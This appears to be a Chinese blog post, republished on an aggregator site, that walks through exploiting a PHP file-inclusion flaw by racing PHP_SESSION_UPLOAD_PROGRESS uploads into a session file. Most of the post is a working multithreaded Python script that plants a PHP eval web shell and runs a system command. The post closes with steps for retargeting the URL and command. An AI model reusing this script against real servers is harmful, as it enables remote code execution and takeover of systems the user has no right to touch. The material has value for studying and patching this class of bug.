PHP_Session文件上传利用:文件包含

Posted hunpi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了PHP_Session文件上传利用:文件包含相关的知识,希望对你有一定的参考价值。

文章目录

本地测试

  本地php的默认配置:
在这里插入图片描述

环境说明

  (1)软件和文件位置说明:

项目说明
文件包含文件的位置http://127.0.0.1/include.php
Session文件的相对存储位置…/Extensions\\tmp\\tmp\\
Python解释器版本python2.7,22行和25行使用xrange()
Python解释器版本Python3.7,22行和25行使用range()
操作系统Win10
PHP配置php5.5.9 默认配置

  (2)具有文件包含漏洞的数据包如下,具有PHPSESSID参数。

GET /include.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_0fba23df1ee7ec49af558fb29456f532=1620301597; security_level=0; PHPSESSID=t2n4a5bgv3mbr1ciupntlk67s7
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Python脚本

  既然Python3可以运行,那就贴出本地成功测试的Python3脚本。

#coding=utf-8
import io
import requests
import threading
sessid = 'TGAO'
data = {"cmd":"system('whoami');"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)    # 写入session文件,会话文件名为sess_sessid
        resp = session.post( 'http://127.0.0.1/include.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:	# 注意,反斜杠需要转义
        resp = session.post('http://127.0.0.1/include.php?file=../Extensions\\\\tmp\\\\tmp\\\\sess_'+sessid,data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30):  # Python2使用xrange(1,30)
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,30):   # Python2使用xrange(1,30)
            threading.Thread(target=read,args=(session,)).start()
    event.set()

  Python3.7的运行效果如下,Python2的运行效果不贴了。
在这里插入图片描述

修改Python利用脚本

  自己本地利用漏洞需要修改的地方,以下为最少修改。
第6行的data,可以自定义命令;
第10行的url,需要配置成具有文件包含漏洞的URL地址;
第13行的url,需要配置成sess_xx文件存储的位置。

以上是关于PHP_Session文件上传利用:文件包含的主要内容,如果未能解决你的问题,请参考以下文章

使用 Python 编写文件上传漏洞Poc

使用 Python 编写文件上传漏洞Poc

文件上传漏洞 分析与利用

文件上传漏洞 分析与利用

.htaccess利用方式

通达OA 任意文件上传+文件包含导致RCE漏洞复现